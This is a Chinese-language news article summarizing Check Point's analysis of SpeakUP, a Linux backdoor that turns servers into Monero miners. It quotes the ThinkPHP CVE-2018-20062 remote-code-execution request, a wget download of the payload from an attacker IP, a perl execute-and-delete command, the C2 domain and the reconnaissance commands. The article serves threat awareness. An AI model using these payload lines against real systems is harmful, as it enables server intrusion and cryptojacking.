域名综合信息查询...
  • 综合
  • Whois
×
历史记录
首页 > 服务器 > 正文

带你了解新型Linux服务器杀手——SpeakUP

发布时间:2019-02-22 15:39:42 来源:晴天 作者:佚名 点击量:981

  日前,全球屈指一首的Internet安全解决方案供应商Check Point IT安全部门研究人员发现了一个通过目前Linux服务器漏洞植入后门木马的黑客活动,此次攻击的目标涵盖了包括AWS主机在内的世界范围的全部服务器。攻击范围涵盖了共6个不同Linux发行版和macOS系统服务器中的已知漏洞,目前黑客的主要攻击目标集中在东亚与拉美地区的Linux服务器。


  全球SpeakUP“受害者”分部


  这次的恶意攻击的罪魁祸首被命名为SpeakUP,命名方式是以其中一台命令与控制(C2)服务器名称进行命名的。据悉Check Point的研究人员发现SpeakUP通过Linux服务器漏洞来植入后门木马的攻击方式可以绕过目前所有安全产品,这是由于该恶意软件中存储了大量此前出现过的攻击案例,致使SpeakUP可以优先识别目前存在的安全漏洞,并成功绕过几乎所有的杀毒软件的“双眼”。
  SpeakUP样本采集
  在Check Point的分析报告中显示,首次发现的SpeakUP样本是今年1月14日在我国的服务器上发现的,该样本曾在1月9日被上传至VirusTotal网站(专业的免费可疑文件分析服务网站)。但经过严密的监测后发现,没有一家安全产品将SpeakUP恶意软件标为恶意。


  这是因为为了逃避安全检测,SpeakUp的代码采用了base64加盐算法加密。不仅如此,C2通信也是采用了相同的方式加密。这也是为什么VirusTotal上的杀毒引擎无法将其检测为恶意的原因所在。
  SpeakUP感染全过程:
  植入脚本阶段
  根据Check Point报告中披露的数据来看,SpeakUP首先是利用ThinkPHP(轻量级PHP开发框架)的一个漏洞为攻击起点,从中植入一个PHP shell脚本。
  使用GET请求(如下所示),通过ThinkPHP远程代码执行漏洞CVE-2018-20062将shell脚本发送到目标服务器:
  s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php
  这个shell脚本接下来会通过query中的“module”参数来执行命令。
  植入后门阶段
  在脚本生效之后,SpeakUP将进行像服务器植入后门的操作
  发送另一个HTTP请求(如下所示)到目标服务器:
  /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  实际上,这是一个注入过程,目的是植入ibus payload并将其存储到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  启动后门并抹除痕迹阶段
  在植入后门成功后,SpeakUP将对服务器发送请求,启动后门,在启动后门后SpeakUP将通过删除文件来清楚自己的感染痕迹。
  使用如下HTTP请求来执行后门:
  /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc
  SpeakUP感染后果:
  在Linux服务器被感染后,SpeakUP使用POST和GET请求来与C2通信,C2是被黑的speakupomaha[.]com.。
  第一个post请求会发送受害者ID和其他介绍性的信息,比如安装的脚本的当前版本等。
  对应的C2响应是needrgr,表示受感染的受害者之前未在服务器上注册,需要注册。
  之后,木马会通过执行以下的Linux命令来POST机器的全部信息:
  · Uname (-r, -v, -m, -n,-a, -s)
  · Whoami
  · Ifconfig –a
  · Arp –a
  · cat /proc/cpuinfo | grep -c “cpu family” 2>&1
  · who –b


  一旦受感染服务器注册完成,C2服务器就会发送新的任务——不同的C2服务器会命名受感染服务器来下载和执行不同的文件。
  有一个需要注意的点是,SpeakUP使用了User-Agent用户代理。具体来说,SpeakUp定义了三个用户代理,而受感染服务器在与C2服务器进行通信时必须使用这些代理。其中两个代理是MacOS X User-Agent,第三个是经过哈希处理的字符串:
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
  E9BC3BD76216AFA560BFB5ACAF5731A3


  目前,SpeakUp主要服务于XMRig矿工,为其提供“肉鸡(受感染服务器)”。根据XMRHunter网站的查询结果显示,攻击者的钱包目前拥有约107枚门罗币。
  SpeakUP强大的自我传播能力
  攻击者还为SpeakUp配备了一个“i”模块,它实际上是一个python脚本,使得SpeakUP能够扫描和感染位于受感染服务器所处内网和外网的其他更多的Linux服务器。其主要功能有:
  使用预定义的用户名和密码来暴力破解尝试登陆管理面板;
  扫描受感染服务器的网络环境,检测共享相同内部和外部子网掩码的服务器上的特定端口的可用性;
  尝试利用目标服务器上的远程代码执行漏洞

服务器链接:https://www.juming.com/qifu/server?t=seo_adfwq
声明:本网站发布的内容(图片、视频和文字)以原创、转载和分享网络内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:400-997-2996;邮箱:service@Juming.com。本站原创内容未经允许不得转载,或转载时需注明出处:聚名网 带你了解新型Linux服务器杀手——SpeakUP
关键词: 服务器杀手
服务器相关文章

登录聚名,您可以享受以下权益:

立即登录/注册